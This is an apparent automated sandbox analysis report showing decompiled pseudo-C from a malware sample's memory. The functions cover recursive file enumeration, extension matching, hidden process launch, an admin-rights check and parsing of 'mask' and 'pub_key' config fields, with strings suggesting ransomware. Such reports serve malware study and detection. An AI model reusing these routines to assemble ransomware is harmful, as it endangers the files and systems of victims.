Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: 6aa62afe37e65dce2c0524c95e802c5302e6b667a33da4d36561c6cfc25818b8
Instruction ID: cd4b768cad4fd47f522eefe34a2b9393e2e9f5bb8233fe787783090936385b04
Opcode Fuzzy Hash: 6aa62afe37e65dce2c0524c95e802c5302e6b667a33da4d36561c6cfc25818b8
Instruction Fuzzy Hash: BC2134B1E4021D7FE7106B759C85F7FB76CDB46AEAF000235FD01A2280EA38AC1146A0

Uniqueness

Uniqueness Score: -1.00%

Function 0FE669B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FE669B0(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xfe72a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xfe72a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0FE66AEA), ref: 0FE669D2

Strings

%s , xrefs: 0FE66A19

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s
API String ID: 1659193697-4273690596
Opcode ID: 3f8056916eb7b0ff61133e6d40045b7714e09e89491d420760dd0108bed40391
Instruction ID: 04436c4035763697e6bf30973b7f90f7e72112e38654ca8dbe7607d998449d07
Opcode Fuzzy Hash: 3f8056916eb7b0ff61133e6d40045b7714e09e89491d420760dd0108bed40391
Instruction Fuzzy Hash: D8215772AA122C97D7304B1D9C003B273E8EF817A9F44923AEC0A9F181E7B5AD4083D0

Uniqueness

Uniqueness Score: -1.00%

Function 0FE64E10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FE64E10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0FE69170( &_v92, 0, 0x44);
				_t15 =  *0xfe72a6c; // 0x0
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xfe72a68; // 0x0
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x0fe64e1c
0x0fe64e22
0x0fe64e24
0x0fe64e29
0x0fe64e2e
0x0fe64e36
0x0fe64e39
0x0fe64e3c
0x0fe64e41
0x0fe64e48
0x0fe64e4d
0x0fe64e58
0x0fe64e77
0x0fe64e8d
0x0fe64e98
0x0fe64e79
0x0fe64e83
0x0fe64e83

APIs

_memset.LIBCMT ref: 0FE64E29
CreateProcessW.KERNEL32 ref: 0FE64E6F
GetLastError.KERNEL32(?,?,00000000), ref: 0FE64E79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FE64E8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FE64E92

Strings

D, xrefs: 0FE64E58

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: ee60e0e9121d4b7046675f5288fa45b32a4299210321be3a91b2f4a24193f42b
Instruction ID: f62ae1e545637a2582eebb2137ea6e4d4cb50a21b3f0ea497c7699c307f95602
Opcode Fuzzy Hash: ee60e0e9121d4b7046675f5288fa45b32a4299210321be3a91b2f4a24193f42b
Instruction Fuzzy Hash: 28012171E4031CABDB20DBA59C45BDE7BB8EF05765F100126F608BA180E7B525548B94

Uniqueness

Uniqueness Score: -1.00%

Function 0FE63C70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0FE63C70() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x0fe63c79
0x0fe63c99
0x0fe63ca0
0x0fe63ca8
0x0fe63cbf
0x0fe63cce
0x0fe63cd5
0x0fe63cd7
0x0fe63cda
0x0fe63ce6
0x0fe63cad
0x0fe63cad
0x0fe63cad

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FE63CA0
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0FE63CB3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0FE63CBF
FreeSid.ADVAPI32(?), ref: 0FE63CDA

Strings

advapi32.dll, xrefs: 0FE63CAE
CheckTokenMembership, xrefs: 0FE63CB9

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: 776c73fe661ac1e075c4f8bbb9428ea429f615aea98856a8b50fb2e356bf36fb
Instruction ID: 8d92432b3251bcfe7d2173dc999c093f062ae323b814769c364f71188c24d3ce
Opcode Fuzzy Hash: 776c73fe661ac1e075c4f8bbb9428ea429f615aea98856a8b50fb2e356bf36fb
Instruction Fuzzy Hash: 37F04970E8030DBBEB009FE5EC0AFAEB7B8FB04B56F000594F900A6281E77866148B51

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66E69 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0FE66E69() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0FE66AB0(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0FE66DF0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

APIs

lstrcmpW.KERNEL32(?,0FE6FF48,?,?), ref: 0FE66E7C
lstrcmpW.KERNEL32(?,0FE6FF4C,?,?), ref: 0FE66E96
lstrcatW.KERNEL32(00000000,?), ref: 0FE66EA8
lstrcatW.KERNEL32(00000000,0FE6FF7C), ref: 0FE66EB9

Part of subcall function 0FE66DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FE66E23
Part of subcall function 0FE66DF0: lstrcatW.KERNEL32(00000000,0FE6FF44), ref: 0FE66E3B
Part of subcall function 0FE66DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FE66E45

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FE66F1D
FindClose.KERNEL32(00003000,?,?), ref: 0FE66F2E

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: ef1c22519ee6b56b27efa3b4805937b4459632003ac36539f266ee9fd4d0c5ab
Instruction ID: 209b2c3fd9339854a2f96eaa0c6c728ff7326a6b216430667c3e22bd5c08afa7
Opcode Fuzzy Hash: ef1c22519ee6b56b27efa3b4805937b4459632003ac36539f266ee9fd4d0c5ab
Instruction Fuzzy Hash: 35019231A4424DABCF21AF61EC48BEEBBB9FF05784F0050B5F805E6011EB359A50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0FE63200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE63200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

APIs

lstrlenA.KERNEL32(0FE65444,00000000,?,0FE65445,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE63251
GetProcessHeap.KERNEL32(00000008,00000001,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE6325B
HeapAlloc.KERNEL32(00000000,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE63262
lstrlenA.KERNEL32(0FE65444,00000000,?,0FE65445,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE63273
GetProcessHeap.KERNEL32(00000008,00000001,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE6327D
HeapAlloc.KERNEL32(00000000,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE63284
lstrcpyA.KERNEL32(00000000,0FE65444,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE63293

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: cf7faf01de64981f78617d83b28c9cef647e5fdd9d8e77ec36a7ae17c65448eb
Instruction ID: e53baa95c169132b52004e3b2cfb61629b5c47e2cba2d399c7df1c74df2ce499
Opcode Fuzzy Hash: cf7faf01de64981f78617d83b28c9cef647e5fdd9d8e77ec36a7ae17c65448eb
Instruction Fuzzy Hash: 081129B048414C6EE7101F68940C7A7BB58EF837EDF645016E8C5DB303C739A46687A0

Uniqueness

Uniqueness Score: -1.00%

Function 0FE633E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FE633E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0FE632B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0FE63320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0FE63190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0FE63200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x97850fe0
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

APIs

Part of subcall function 0FE632B0: lstrlenA.KERNEL32(?,00000000,?,0FE65444,?,?,0FE633F6,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE632C5
Part of subcall function 0FE632B0: lstrlenA.KERNEL32(?,?,0FE633F6,00000000,00000000,?,?,0FE65444,00000000,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE632EE

lstrlenA.KERNEL32(0FE65445,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE63484
GetProcessHeap.KERNEL32(00000008,00000001,?,0FE65444,00000000,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE6348E
HeapAlloc.KERNEL32(00000000,?,0FE65444,00000000,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE63495
lstrcpyA.KERNEL32(00000000,0FE65445,?,0FE65444,00000000,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE634A7
ExitProcess.KERNEL32 ref: 0FE634DB

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: 5e4433a199ba9746d8a669ffe02ac9b6c0ae64fb1f8a40d28a8b47a1943e8595
Instruction ID: 35f9676ff62a7dd7f40bde4a17c7b415abd7a126b866953b31e897618aedd4f1
Opcode Fuzzy Hash: 5e4433a199ba9746d8a669ffe02ac9b6c0ae64fb1f8a40d28a8b47a1943e8595
Instruction Fuzzy Hash: 24313B7458424D5EDB221F2884447F6FBA49B023D8F94615AE8C5DB383D63DA447C760

Uniqueness

Uniqueness Score: -1.00%

Function 0FE63CF0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0FE63D42
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FE63D66
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FE63D6A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FE63D6E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FE63D95

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: d8aadebea9dbdb255323ae30613529b8dbc7b8f51f0148ea0a3ac751c342b52f
Instruction ID: 2ff9e5369dc46f0b0de66f5e720302f210d528150afcd27073b58abfc651514b
Opcode Fuzzy Hash: d8aadebea9dbdb255323ae30613529b8dbc7b8f51f0148ea0a3ac751c342b52f
Instruction Fuzzy Hash: C8111EB0D4031C6EEB609F65DC0ABEB7ABCEB08700F008199A608E61C1D6B95B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0FE64EA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FE64EA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xfe6faac]");
				_t16 =  *0xfe6fab4; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,0FE651ED), ref: 0FE64F0D
lstrlenA.KERNEL32(00000000,?,0FE651ED), ref: 0FE64F67
lstrcpyA.KERNEL32(?,?,?,0FE651ED), ref: 0FE64F98

Strings

fabian wosar <3, xrefs: 0FE64F05

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: f94bd242130ed551a6d0ce0c5202f7bddc44eb2ab636ef8195024eadc430163a
Instruction ID: 11a43c8bd0ad4f85876aca2c227f206dcc8488c95cfe72c2ca3b2d96d761ed11
Opcode Fuzzy Hash: f94bd242130ed551a6d0ce0c5202f7bddc44eb2ab636ef8195024eadc430163a
Instruction Fuzzy Hash: B3315A21C881AD4ACB33CE3858143FABFA2AF435D9F9831F9D8D59B187D7616406C390

Uniqueness

Uniqueness Score: -1.00%

Function 0FE63190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE63190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

APIs

